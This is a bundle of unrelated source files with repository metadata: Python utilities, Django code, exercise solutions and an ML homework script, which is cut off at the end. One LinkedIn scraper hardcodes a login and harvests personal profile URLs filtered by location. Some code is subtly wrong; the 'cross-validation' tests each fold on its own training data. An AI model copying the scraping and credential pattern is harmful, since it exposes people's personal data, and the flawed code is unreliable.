if global_vars.modem_data["connected"] and global_vars.modem_data["data_usage"]["current"]["connected_time"]:
return True
else:
return False
except Exception as e:
logger.error("Connection check failed: " + str(e))
return False
def connection_checker():
if not net_connected():
logger.warning("Modem is not connected!")
send_connection_req()
pass
# If this file is run directly, check and keep the lte connection alive
def main():
load_config()
while True:
sleep(5)
get_modem_data()
connection_checker()
if __name__ == '__main__':
from yaml_config import load_config
main()
|
[
"root@frillip.com"
] |
root@frillip.com
|
7c99fc847d229c37303986261ca215365661c576
|
f76b6755dedfdcc78ea794ae47cf25006539a70b
|
/src/restaurants/validators.py
|
31756343b9e1a23fef28bda8bb05907e5542c897
|
[] |
no_license
|
ericliu1990/trydjango1-11
|
22b2542bebce88ab73b49c84b2926b590f97b90c
|
62fefcbc54f6bb51458c4d52cda77a36de2f6f07
|
refs/heads/master
| 2022-10-29T04:36:51.909336
| 2018-07-08T11:02:49
| 2018-07-08T11:02:49
| 136,959,340
| 0
| 1
| null | 2022-10-08T21:53:33
| 2018-06-11T17:31:28
|
Python
|
UTF-8
|
Python
| false
| false
| 599
|
py
|
from django.core.exceptions import ValidationError
def validate_even(value):
if value % 2 != 0:
raise ValidationError(
'%(value)s is not an even number',
params={'value': value},
)
# def clean_email(value):
# email = value
# if ".edu" in email:
# raise forms.ValidationError("We do not accept edu emails")
CATEGORIES = ['Mexico', 'western', 'Asian', 'Unknown']
def validate_category(value):
cat = value.capitalize()
if not value in CATEGORIES and not cat in CATEGORIES:
raise ValidationError(f"{value} not a valid category")
|
[
"liuyuanzhe1990@gmail.com"
] |
liuyuanzhe1990@gmail.com
|
551ee0b90811398f10ba839d1ac6c9fe209d7abd
|
98f569d829cc8389f123f7c0673f9d20080dd090
|
/linkedintest/profileURLScraper.py
|
dc496d692efd7971f143379cf86430c9df2d4e36
|
[
"MIT",
"Apache-2.0"
] |
permissive
|
1kyte/Linkedin-Analysis
|
be491aef889ccfb0d5b1ad660172c579e4f842ff
|
091e0bcd5a7394cbc5e4bfa90d9cae529032ada6
|
refs/heads/master
| 2021-09-26T10:00:42.048185
| 2018-10-28T22:13:40
| 2018-10-28T22:13:40
| 143,820,287
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,626
|
py
|
import re, time, json,csv
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import WebDriverException
from bs4 import BeautifulSoup
import csv
urlLists = []
got = []
length = 0
page = 2
def opendrive():
global got,length
try:
driver = webdriver.Firefox(executable_path = '/Users/PaulaZ/Downloads/geckodriver')
driver.get("https://www.linkedin.com/?trk=brandpage_baidu_pc-mainlink")
driver.find_element_by_id('login-email').send_keys("analysisZ@outlook.com")
driver.find_element_by_id('login-password').send_keys("pa$$w0rd")
driver.find_element_by_xpath('//*[@id="login-submit"]').click()
url = 'https://www.linkedin.com/in/lucinda-dalla-riva-65371685/'
getToThePage(driver, url)
got.append(url)
length+=1
for u in urlLists:
for us in u:
getToThePage(driver, us[0])
except (NoSuchElementException,WebDriverException), message:
print message
finally:
driver.close()
def checkLocation(obs):
try:
locationTag = obs.find_all('h3',{'class':'pv-top-card-section__location t-16 t-black--light t-normal mt1 inline-block'})
if not locationTag ==[]:
for l in locationTag:
l1 = re.findall(r'\n\s*.*\n',str(l))
l2 = str(l1[0]).strip().strip('\\n\s')
print l2
if 'Australia' in l2 or 'au' in l2 or 'AU' in l2 or 'Melbourne' in l2 or 'VIC' in l2 or 'Victoria' in l2 or 'victoria' in l2:
return True
else:
return False
else:
return True
except (NoSuchElementException,WebDriverException), message:
print message
def getToThePage(driver,url):
try:
global urlLists,got,length,page
driver.get(url)
scrollDown(driver)
obs = BeautifulSoup(driver.page_source,'lxml')
urlList = obs.find_all('a',{'class':'pv-browsemap-section__member ember-view'})
if not urlList == []:
urls=[]
for u in urlList:
u1 = re.findall(r'href=.*/\"',str(u))
u2 = str(u1[0]).lstrip('href=\"')
u3 = str(u2).rstrip('\"')
u4 = 'https://www.linkedin.com'+u3
inAus = checkLocation(obs)
if not u4 in got and inAus:
urls.append([u4])
got.append(u4)
print u4
length+=len(urls)
print length
if length>500:
page+=1
length=0
with open("collectionBox/theUrl"+str(page)+".csv", "a") as csvfile:
writer = csv.writer(csvfile)
writer.writerows(urls)
csvfile.close()
urlLists.append(urls)
except (NoSuchElementException,WebDriverException), message:
print message
def scrollDown(driver):
driver.execute_script("window.scrollTo(0,500);")
time.sleep(3)
driver.execute_script("window.scrollTo(500,1000);")
time.sleep(3)
driver.execute_script("window.scrollTo(1000,1500);")
time.sleep(3)
driver.execute_script("window.scrollTo(1500,2000);")
time.sleep(3)
# ======================================================================================================================
# Start the system
# ======================================================================================================================
if __name__ == "__main__":
opendrive()
|
[
"paula555@outlook.com"
] |
paula555@outlook.com
|
0b2ceae86908c5f43a045245f4959e7f4e6f1865
|
7615819f1a46c56cd61848b1b60c8bfb39d7c032
|
/PyPoll_Challenge_starter_code.py
|
c8e17c2e99e8f065c937e20a9712afce6f47a1f0
|
[] |
no_license
|
briannaso/Election_Analysis
|
22c2f099f5c13b1933ecfece81ca897d244aca75
|
939465ea706de3f8b28ec327a7a7eca1cbaee76c
|
refs/heads/main
| 2023-07-16T23:53:49.478237
| 2021-09-06T18:38:47
| 2021-09-06T18:38:47
| 401,509,191
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,229
|
py
|
# -*- coding: UTF-8 -*-
"""PyPoll Homework Challenge Solution."""
# Add our dependencies.
import csv
import os
# Add a variable to load a file from a path.
file_to_load = os.path.join("Resources","election_results.csv")
# Add a variable to save the file to a path.
file_to_save = os.path.join("analysis","election_analysis.txt")
# Initialize a total vote counter.
total_votes = 0
# Candidate Options and candidate votes.
candidate_options = []
candidate_votes = {}
# 1: Create a county list and county votes dictionary.
# Track the winning candidate, vote count and percentage
winning_candidate = ""
winning_count = 0
winning_percentage = 0
# 2: Track the largest county and county voter turnout.
# Read the csv and convert it into a list of dictionaries
with open(file_to_load) as election_data:
reader = csv.reader(election_data)
# Read the header
header = next(reader)
# For each row in the CSV file.
for row in reader:
# Add to the total vote count
total_votes = total_votes + 1
# Get the candidate name from each row.
candidate_name = row[2]
# 3: Extract the county name from each row.
# If the candidate does not match any existing candidate add it to
# the candidate list
if candidate_name not in candidate_options:
# Add the candidate name to the candidate list.
candidate_options.append(candidate_name)
# And begin tracking that candidate's voter count.
candidate_votes[candidate_name] = 0
# Add a vote to that candidate's count
candidate_votes[candidate_name] += 1
# 4a: Write an if statement that checks that the
# county does not match any existing county in the county list.
# 4b: Add the existing county to the list of counties.
# 4c: Begin tracking the county's vote count.
# 5: Add a vote to that county's vote count.
# Save the results to our text file.
with open(file_to_save, "w") as txt_file:
# Print the final vote count (to terminal)
election_results = (
f"\nElection Results\n"
f"-------------------------\n"
f"Total Votes: {total_votes:,}\n"
f"-------------------------\n\n"
f"County Votes:\n")
print(election_results, end="")
txt_file.write(election_results)
# 6a: Write a for loop to get the county from the county dictionary.
# 6b: Retrieve the county vote count.
# 6c: Calculate the percentage of votes for the county.
# 6d: Print the county results to the terminal.
# 6e: Save the county votes to a text file.
# 6f: Write an if statement to determine the winning county and get its vote count.
# 7: Print the county with the largest turnout to the terminal.
# 8: Save the county with the largest turnout to a text file.
# Save the final candidate vote count to the text file.
for candidate_name in candidate_votes:
# Retrieve vote count and percentage
votes = candidate_votes.get(candidate_name)
vote_percentage = float(votes) / float(total_votes) * 100
candidate_results = (
f"{candidate_name}: {vote_percentage:.1f}% ({votes:,})\n")
# Print each candidate's voter count and percentage to the
# terminal.
print(candidate_results)
# Save the candidate results to our text file.
txt_file.write(candidate_results)
# Determine winning vote count, winning percentage, and candidate.
if (votes > winning_count) and (vote_percentage > winning_percentage):
winning_count = votes
winning_candidate = candidate_name
winning_percentage = vote_percentage
# Print the winning candidate (to terminal)
winning_candidate_summary = (
f"-------------------------\n"
f"Winner: {winning_candidate}\n"
f"Winning Vote Count: {winning_count:,}\n"
f"Winning Percentage: {winning_percentage:.1f}%\n"
f"-------------------------\n")
print(winning_candidate_summary)
# Save the winning candidate's name to the text file
txt_file.write(winning_candidate_summary)
|
[
"sosa.brianna8@gmail.com"
] |
sosa.brianna8@gmail.com
|
eac1a4b950941874a711cae6bba923273a58161f
|
65f0e21c9bb8fd08d2bf7a4e0c9c6d900392a7fc
|
/hand_tracking/index.py
|
a50de5d5fa940b446f9240a476415c83c0f7f693
|
[] |
no_license
|
GustavoCunhaLacerda/area51
|
7a6adcb278aea4d06431bc8135a267d190995e73
|
cea7c48ac7467bff2127ef9a5858d850c3cc1420
|
refs/heads/master
| 2023-08-28T08:19:04.133839
| 2021-10-26T22:00:02
| 2021-10-26T22:00:02
| 410,167,035
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,031
|
py
|
# from hand_tracking_module import HandDetector
import hand_tracking_module as htm
import mediapipe as mp
import cv2
import os
import math
def load_images_from_folder(folder):
images = []
for filename in os.listdir(folder):
img = cv2.imread(os.path.join(folder, filename))
if img is not None:
images.append(img)
return images
def resize(img, DESIRED_HEIGHT=480, DESIRED_WIDTH=480):
h, w = img.shape[:2]
if h < w:
return cv2.resize(img, (DESIRED_WIDTH, math.floor(h/(w/DESIRED_WIDTH))))
else:
return cv2.resize(img, (math.floor(w/(h/DESIRED_HEIGHT)), DESIRED_HEIGHT))
def main():
images = load_images_from_folder('./hands')
detector = htm.HandDetector(mode=True)
print(detector)
id = 0
for img in images:
cv2.imshow(f"Image {id}", detector.findHands(resize(img)))
id += 1
index = 2
cv2.imshow(f"Image {id}", detector.findHands(resize(images[index])))
cv2.waitKey(0)
if __name__ == "__main__":
main()
|
[
"gustavocunhalacerda@gmail.com"
] |
gustavocunhalacerda@gmail.com
|
8aaaf878028d89edbb4171b45bd1a09f332f380c
|
59dcec7ca27b49ee2cdd705c2860c4f3e4141609
|
/private/gen_table_xp.py
|
b814ef1af73855dedfcba5d346887db051a18eba
|
[
"LicenseRef-scancode-public-domain"
] |
permissive
|
footballhead/zardwars-revival
|
d0b4faacdb2ac1139942dc2a382607296100dc57
|
a0c97487784c3e19eca01e28b97d9408ba7c0dc7
|
refs/heads/master
| 2021-01-10T11:45:35.755002
| 2019-07-06T00:52:12
| 2019-07-06T00:52:12
| 36,998,305
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 520
|
py
|
#!/usr/bin/env python
import sys
def main():
print("<table><tbody>")
print("<tr><th>LEVEL</th><th>EXP NEEDED</th></tr>")
memo = {}
memo[1] = 100.0
print(f"<tr><td>1</td><td>{int(memo[1])}</td></tr>")
for lvl in range(2, 111):
memo[lvl] = memo[lvl-1] * 1.1
if memo[lvl] > 2000000:
memo[lvl] = 2000000
print(f"<tr><td>{lvl}</td><td>{int(memo[lvl])}</td></tr>")
print("</tbody></table>")
return 0
if __name__ == '__main__':
sys.exit(main())
|
[
"mdhitchens@gmail.com"
] |
mdhitchens@gmail.com
|
b5c5f8e3ab90157f0a3222bf826041a3ef6bcb5b
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/2f9vjBiynkBtF3TBi_5.py
|
2de62cfd6805420701dc4149649d92594859e806
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264
| 2021-03-23T16:08:01
| 2021-03-23T16:08:01
| 350,773,815
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,072
|
py
|
"""
In this challenge, you must verify the equality of two different values given
the parameters `a` and `b`.
Both the _value_ and _type_ of the parameters need to be equal. The possible
types of the given parameters are:
* Numbers
* Strings
* Booleans (`False` or `True`)
* Special values: `None`
What have you learned so far that will permit you to do two different checks
(value **and** type) with a single statement?
Implement a function that returns `True` if the parameters are equal, and
`False` if they are not.
### Examples
check_equality(1, true) ➞ False
# A number and a boolean: the value and type are different.
check_equality(0, "0") ➞ False
# A number and a string: the type is different.
check_equality(1, 1) ➞ True
# A number and a number: the type and value are equal.
### Notes
* If you get stuck on a challenge, find help in the **Resources** tab.
* If you're _really_ stuck, unlock solutions in the **Solutions** tab.
"""
def check_equality(a, b):
return True if a is b else False
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
f9e0c0f6922c687aff6dd1f02122ff3ea4c8b3f6
|
47a6dc3718ef0945eaa7a3cf3c02fd64d4c6b8df
|
/DataStructAlgo/leetcode/345.py
|
6c13f18dfc37afd9bf721d07bf501595c35fe5d9
|
[] |
no_license
|
NootNootow/ML_Algo_projects
|
158f4994e2daae6d71c2a314d1701861c5151b73
|
873a05a5ce344c82db56317bbd02bf23d9a8eb71
|
refs/heads/main
| 2023-04-19T23:46:30.232961
| 2021-04-28T21:59:09
| 2021-04-28T21:59:09
| 343,967,500
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 414
|
py
|
class Solution:
def reverseVowels(self, s: str) -> str:
if not s: return ""
s = list(s)
vowels = set(['a','A','e','E','i','I','o','O','u','U'])
i,j =0,len(s)-1
while i < j:
while i < j and s[i] not in vowels: i+=1
while j > i and s[j] not in vowels: j-=1
s[i],s[j]=s[j],s[i]
i+=1
j-=1
return ''.join(s)
|
[
"aniruddh20.sxn@gmail.com"
] |
aniruddh20.sxn@gmail.com
|
407ab58ead7a9e41a362509107c5fa28e748f676
|
315af6a46b15e6eff887ae37aff9737286dfc1d8
|
/apps/tienda/migrations/0002_auto_20200810_1608.py
|
29253f72580062c077118e3cd031e748dd3b3228
|
[] |
no_license
|
andresx213/clase
|
b5c8c9b1f2fc4d9fdda180dcfd825f639085d676
|
1d27456e3ef236e2764f363cd3cacd783a69ca7e
|
refs/heads/master
| 2022-11-29T19:38:25.918295
| 2020-08-10T19:52:18
| 2020-08-10T19:52:18
| 286,567,207
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 961
|
py
|
# Generated by Django 3.0.8 on 2020-08-10 14:08
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('maintenance', '0001_initial'),
('tienda', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='cuotas',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pricio', models.IntegerField()),
],
),
migrations.AddField(
model_name='tienda',
name='cliente',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='maintenance.cliente'),
),
migrations.AddField(
model_name='tienda',
name='cuotas',
field=models.ManyToManyField(to='tienda.cuotas'),
),
]
|
[
"andresortega2015@gmail.com"
] |
andresortega2015@gmail.com
|
70d844bd4f95d34a6aa51e7a2cc32836e4bf8dae
|
b4656ac72b4b6449e28fa6979af84eef63bcf5e8
|
/StacksQueue/Queue.py
|
b44a27465d276da6541ebc3b204385473ebd0f0b
|
[] |
no_license
|
ch317/algos-ds
|
98e2fe8fcf383efd8a2da68b2aff8dca39700cac
|
30e8ef1a4103751822b37e8be78bf64e51335fcb
|
refs/heads/main
| 2023-06-16T19:17:26.797558
| 2021-07-19T16:21:05
| 2021-07-19T16:21:05
| 377,563,906
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,397
|
py
|
class Node:
def __init__(self, data):
self.data = data
self.next = None
class Queue:
def __init__(self):
self.first = None
self.last = None
def add(self, node):
#If list was empty, then we set first and last to this new node added
if self.first == None:
self.first = node
self.last = node
return
node.next = self.last
self.last = node
def remove(self):
if self.first is None: #Queue is empty
raise TypeError
if self.first == self.last: #Queue has 1 element
self.first = None
self.last = None
return
#If Queue has >=2 elements, we traverse the queue starting from last until we find second to element and update
current = self.last
while current.next != self.first:
current = current.next
#Here current points to the second element of the Queue
current.next = None
self.first = current
def peek(self):
if self.first is None:
raise TypeError
return self.first.data
def isEmpty(self):
return self.first is None
#Last element of the queue is on the left and first element is on the right "a->b->c"
def print(self):
if self.first is None:
print("Empty Queue")
return
current = self.last
queueStr = ""
while current.next != None:
queueStr += str(current.data) + "->"
current = current.next
queueStr += str(current.data)
print(queueStr)
# stuff to run always here such as class/def
def testQueue():
#Tests
#1. We create an empty Queue:
node1 = Node(5)
node2 = Node(3)
node3 = Node(2)
#We create the Queue Top: 2->3->5
queue = Queue()
queue.add(node1)
queue.add(node2)
queue.add(node3)
queue.print() #2->3->5
print(queue.peek()) #Print 5
queue.remove() #We delete 5
print(queue.peek()) #Print 3
queue.print() #Print Top: 2->3
print(queue.isEmpty()) #Print False
queue.remove()
queue.remove()
print(queue.isEmpty()) #Print True
queue.print() #Empty queue
if __name__ == "__main__":
# stuff only to run when not called via 'import' here
testQueue()
|
[
"poleadornato@gmail.com"
] |
poleadornato@gmail.com
|
e28e74228f1af21ae745a066e94997e5017c48a7
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03060/s273862278.py
|
42e46ce98c38ed062b3f6706f319584553664cc6
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 317
|
py
|
import sys
import math
import bisect
def main():
n = int(input())
A = list(map(int, input().split()))
B = list(map(int, input().split()))
for i in range(n):
A[i] -= B[i]
ans = 0
for a in A:
if a > 0:
ans += a
print(ans)
if __name__ == "__main__":
main()
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
42ae67ce07d3cfed6b59c006324d5681c7d42706
|
537dcffe30dc5929c93c9af9a9fb096811a224f4
|
/website_sale_delivery_dhub/__manifest__.py
|
ba4959460ca18e44b950b44fa69c97d0c13b8f6c
|
[] |
no_license
|
vidtsin/psbe-digitalhub-v12
|
7b0896da422209113537ffbbfbb7bf38e301cb6a
|
851e6885f51ebe15265cac4d837a856651f21191
|
refs/heads/master
| 2020-07-01T18:04:11.814231
| 2019-08-07T14:00:00
| 2019-08-07T14:00:00
| 201,248,369
| 0
| 1
| null | 2019-08-08T11:55:37
| 2019-08-08T11:55:37
| null |
UTF-8
|
Python
| false
| false
| 378
|
py
|
# -*- coding: utf-8 -*-
{
'name': "website_sale_delivery_dhub",
'summary': "",
'description': """
DHub's eCommerce Customizations
===============================
""",
'author': "Odoo SA",
'website': "http://www.odoo.com",
'category': 'Website',
'version': '1.0',
'depends': ['website_sale_delivery', 'tax_margin'],
'auto_install': True
}
|
[
"herve_delvaux@htomail.com"
] |
herve_delvaux@htomail.com
|
93b7331e9546c59ff029f42ca70839edb26ec064
|
cd91c311196cd3b7209db95a12a7b0bd23099307
|
/plot_data.py
|
17538a78fd7564a4fdf0edb38dda21f9c4ca6d0e
|
[] |
no_license
|
LabNeuroCogDevel/precise_eye_tracking
|
756109c9ff986ba7bffec95c12a022688af8bc5c
|
f68edcdb8ddc14af78ac9f8d19bd2183d2fcabf1
|
refs/heads/master
| 2021-02-25T17:14:24.361096
| 2020-03-10T20:32:00
| 2020-03-10T20:32:00
| 245,459,318
| 0
| 0
| null | 2020-03-06T15:50:22
| 2020-03-06T15:50:21
| null |
UTF-8
|
Python
| false
| false
| 1,333
|
py
|
#Now it's time to plot the data for a better insight
import matplotlib.pyplot as plt
import numpy as np
def plotting(dic):
#Because it is a list that passed in, get the first one
dic = data_format(dic)
fig = plt.figure()
ax1 = fig.add_subplot(111)
print(dic)
y_s_center = np.asarray(dic['s_center'])[:, 0]
x_s_center = np.asarray(create_x(len(y_s_center)))
print(x_s_center.size)
print(y_s_center.size)
y_s_loc = np.asarray(dic['s_loc'])[:, 0]
x_s_loc = np.asarray(create_x(len(y_s_loc)))
y_h_center = np.asarray(dic['h_center'])[:, 0]
x_h_center = np.asarray(create_x(len(y_h_center)))
y_h_loc = np.asarray(dic['h_loc'])[:, 0]
x_h_loc = np.asarray(create_x(len(y_h_loc)))
ax1.scatter(x_s_center, y_s_center, marker = 'd', c='b', label='first')
ax1.scatter(x_s_loc, y_s_loc, marker = 'o', c='r', label='second')
ax1.scatter(x_h_center, y_h_center, marker = 'x', c='g', label='thrid')
ax1.scatter(x_h_loc, y_h_loc, marker = 'v', c='y', label='forth')
#Format the data first
def data_format(dic):
new_dic = {}
new_dic['s_center'] = []
new_dic['s_loc'] = []
new_dic['h_center'] = []
new_dic['h_loc'] = []
dic = dic[0]
for i in dic:
for j in dic[i]:
if abs(j[0][0] - j[1][0]) < 30:
new_dic[i].append(j[0])
def create_x(length):
li = []
for i in range(0, length):
li.append(i)
return li
|
[
"jit29@pitt.edu"
] |
jit29@pitt.edu
|
76c764b02f15869f8e67d49deb461c4fc3b75531
|
6cfe00919ab8c5295c7fb38bb6be73c8dde7d948
|
/transcripton.py
|
403add2dc5ace97399e55eee6b6a2657fa299d7f
|
[] |
no_license
|
ACollectionOfAtoms/rosalind
|
b1232ff2b5a8dce8a15f7109974fdde0f7e46d2e
|
157290c22c81c666cf05e942b7ebd87e47866c35
|
refs/heads/master
| 2021-01-10T20:25:32.795377
| 2015-04-19T14:47:54
| 2015-04-19T14:47:54
| 30,945,822
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 379
|
py
|
def revc():
dna = open('rosalind_dna.txt' , 'r')
strand = ''
revc = ''
for line in dna:
strand += line.strip()
for item in strand:
if item == 'A':
revc += 'T'
if item == 'T':
revc += 'A'
if item == 'C':
revc += 'G'
if item == 'G':
revc += 'C'
print revc[::-1]
revc()
|
[
"hernandezdavid88@utexas.edu"
] |
hernandezdavid88@utexas.edu
|
608fd6a6fa96f4a39e0b5a1649fce87314daa37b
|
a28fe698a9f1f5278ce32623809f7e107b2cd3b1
|
/MLF/hw4.py
|
ba8544dec2c405a5216cda9a6217294b24c07dd7
|
[
"Apache-2.0"
] |
permissive
|
LeoTsui/ML_NTU
|
d73b7a5b8e950bd0fd75afca77c6196acade3f88
|
35bd197654c5f86f7c24b54a7157d4da6b1967d0
|
refs/heads/master
| 2020-07-10T16:29:04.995522
| 2016-09-08T12:10:45
| 2016-09-08T12:10:45
| 67,688,284
| 9
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,397
|
py
|
#!user/bin/env python3
# _*_ coding: utf-8 _*_
"""
Question 13
Experiment with Regularized Linear Regression and Validation
Consider regularized linear regression (also called ridge regression) for classification.
wreg=argminwλN∥w∥2+1N∥Xw−y∥2,
Run the algorithm on the following data set as D
https://d396qusza40orc.cloudfront.net/ntumlone%2Fhw4%2Fhw4_train.dat
and the following set for evaulating Eout
https://d396qusza40orc.cloudfront.net/ntumlone%2Fhw4%2Fhw4_test.dat
Because the data sets are for classification, please consider only the 0/1 error for all the problems below.
Let λ=10, which of the followings is the corresponding Ein and Eout?
Ein=0.050, Eout=0.045
Question 14
Among log10λ={2,1,0,−1,…,−8,−9,−10}. What is the λ with the minimum Ein? Compute λ and its corresponding Ein and Eout then select the closest answer. Break the tie by selecting the largest λ
log10λ=−8,Ein=0.015,Eout=0.020
Question 15
Among log10λ={2,1,0,−1,…,−8,−9,−10}. What is the λ with the minimum Eout? Compute λ and the corresponding Ein and Eout then select the closest answer. Break the tie by selecting the largest λ.
log10λ=−7,Ein=0.030,Eout=0.015
Question 16
Now split the given training examples in D to the first 120 examples for Dtrain and 80 for Dval.
Ideally, you should randomly do the 120/80 split. Because the given examples are already randomly permuted, however, we would use a fixed split for the purpose of this problem.
Run the algorithm on Dtrain to get g−λ, and validate g−λ with Dval.
Among log10λ={2,1,0,−1,…,−8,−9,−10}. What is the λ with the minimum Etrain(g−λ)? Compute λ and the corresponding Etrain(g−λ), Eval(g−λ) and Eout(g−λ) then select the closet answer. Break the tie by selecting the largest λ.
log10λ=−8,Etrain(g−λ)=0.000,Eval(g−λ)=0.050,Eout(g−λ)=0.025
Question 17
Among log10λ={2,1,0,−1,…,−8,−9,−10}. What is the λ with the minimum Eval(g−λ)? Compute λ and the corresponding Etrain(g−λ), Eval(g−λ) and Eout(g−λ) then select the closet answer. Break the tie by selecting the largest λ.
log10λ=0,Etrain(g−λ)=0.033,Eval(g−λ)=0.038,Eout(g−λ)=0.028
Question 18
Run the algorithm with the optimal λ of the previous problem on the whole D to get gλ. Compute Ein(gλ) and Eout(gλ) then select the closet answer.
Ein(gλ)=0.035,Eout(gλ)=0.020
Question 19
Now split the given training examples in D to five folds, the first 40 being fold 1, the next 40 being fold 2, and so on. Again, we take a fixed split because the given examples are already randomly permuted.
Among log10λ={2,1,0,−1,…,−8,−9,−10}. What is the λ with the minimum Ecv, where Ecv comes from the five folds defined above? Compute λ and the corresponding Ecv then select the closet answer. Break the tie by selecting the largest λ.
log10λ=−8,Ecv=0.030
Question 20
Run the algorithm with the optimal λ of the previous problem on the whole D to get gλ. Compute Ein(gλ) and Eout(gλ) then select the closet answer.
Ein(gλ)=0.015,Eout(gλ)=0.020
"""
import time
import numpy as np
def ridge_reg(x, y, lmd):
z = np.linalg.inv(np.dot(x.transpose(), x) + lmd * np.eye(x.shape[1]))
return np.dot(np.dot(z, x.transpose()), y)
def err_01(x, y, w):
return np.sign(np.dot(x, w)) != y
def err_func(x, y, w, n):
e = 0
for i in range(n):
if err_01(x[i], y[i], w):
e += 1
return e / n
def read_file(f):
x_d = []
y_d = []
with open(f, 'r') as d:
for line in d:
l = line.split()
x = [1.0] + [float(v) for v in l[: -1]]
x_d.append(x)
y_d.append(int(l[-1]))
return np.array(x_d), np.array(y_d), len(y_d)
def quiz13(lmd=10):
x_in, y_in, n_in = read_file("hw4_train.dat")
x_out, y_out, n_out = read_file("hw4_test.dat")
w_reg = np.array(ridge_reg(x_in, y_in, lmd)).flatten()
e_in = err_func(x_in, y_in, w_reg, n_in)
e_out = err_func(x_out, y_out, w_reg, n_out)
return e_in, e_out
def quiz14():
x_in, y_in, n_in = read_file("hw4_train.dat")
x_out, y_out, n_out = read_file("hw4_test.dat")
best_e_in = float("inf")
best_lmd = 0
w = 0
for lmd in range(2, -11, -1):
w_reg = np.array(ridge_reg(x_in, y_in, pow(10, lmd))).flatten()
e_in = err_func(x_in, y_in, w_reg, n_in)
if e_in < best_e_in:
best_e_in = e_in
w = w_reg
best_lmd = lmd
e_out = err_func(x_out, y_out, w, n_out)
return best_lmd, best_e_in, e_out
def quiz15():
x_in, y_in, n_in = read_file("hw4_train.dat")
x_out, y_out, n_out = read_file("hw4_test.dat")
best_e_out = float("inf")
best_lmd = 0
w = 0
for lmd in range(2, -11, -1):
w_reg = np.array(ridge_reg(x_in, y_in, pow(10, lmd))).flatten()
e_out = err_func(x_out, y_out, w_reg, n_out)
if e_out < best_e_out:
best_e_out = e_out
w = w_reg
best_lmd = lmd
e_in = err_func(x_in, y_in, w, n_in)
return best_lmd, e_in, best_e_out
def quiz16():
x_in, y_in, n_in = read_file("hw4_train.dat")
x_out, y_out, n_out = read_file("hw4_test.dat")
n_train = 120
n_val = 80
x_train = x_in[:120]
y_train = y_in[:120]
x_val = x_in[120:]
y_val = y_in[120:]
best_e_train = float("inf")
best_lmd = 0
w = 0
for lmd in range(2, -11, -1):
w_reg = np.array(ridge_reg(x_train, y_train, pow(10, lmd))).flatten()
e_train = err_func(x_train, y_train, w_reg, n_train)
if e_train < best_e_train:
best_e_train = e_train
w = w_reg
best_lmd = lmd
e_out = err_func(x_out, y_out, w, n_out)
e_val = err_func(x_val, y_val, w, n_val)
return best_lmd, best_e_train, e_val, e_out
def quiz17():
x_in, y_in, n_in = read_file("hw4_train.dat")
x_out, y_out, n_out = read_file("hw4_test.dat")
n_train = 120
n_val = 80
x_train = x_in[:n_train]
y_train = y_in[:n_train]
x_val = x_in[120:]
y_val = y_in[120:]
best_e_val = float("inf")
best_lmd = 0
w = 0
for lmd in range(2, -11, -1):
w_reg = np.array(ridge_reg(x_train, y_train, pow(10, lmd))).flatten()
e_val = err_func(x_val, y_val, w_reg, n_val)
if e_val < best_e_val:
best_e_val = e_val
w = w_reg
best_lmd = lmd
e_train = err_func(x_train, y_train, w, n_train)
e_out = err_func(x_out, y_out, w, n_out)
return best_lmd, e_train, best_e_val, e_out
def quiz18():
x_in, y_in, n_in = read_file("hw4_train.dat")
x_out, y_out, n_out = read_file("hw4_test.dat")
n_train = 120
n_val = 80
x_train = x_in[:n_train]
y_train = y_in[:n_train]
x_val = x_in[120:]
y_val = y_in[120:]
best_e_val = float("inf")
best_lmd = 0
for lmd in range(2, -11, -1):
w_reg = np.array(ridge_reg(x_train, y_train, pow(10, lmd))).flatten()
e_val = err_func(x_val, y_val, w_reg, n_val)
if e_val < best_e_val:
best_e_val = e_val
best_lmd = lmd
return quiz13(pow(10, best_lmd))
def quiz1920(split=40):
x_in, y_in, n_in = read_file("hw4_train.dat")
x_out, y_out, n_out = read_file("hw4_test.dat")
n_cv = split
best_e_cv = float("inf")
best_lmd = 0
for lmd in range(2, -11, -1):
e_cv = 0
for i in range(int(n_in / n_cv)):
x_cv = x_in[n_cv * i: n_cv * (i + 1)]
y_cv = y_in[n_cv * i: n_cv * (i + 1)]
w_reg = np.array(ridge_reg(x_cv, y_cv, pow(10, lmd))).flatten()
e_cv += err_func(x_cv, y_cv, w_reg, n_cv)
print(lmd, e_cv)
if e_cv < best_e_cv:
best_e_cv = e_cv
best_lmd = lmd
w = np.array(ridge_reg(x_in, y_in, pow(10, best_lmd))).flatten()
e_in = err_func(x_in, y_in, w, n_in)
e_out = err_func(x_out, y_out, w, n_out)
return best_lmd, best_e_cv, e_in, e_out
def main():
np.random.seed()
start_time = time.time()
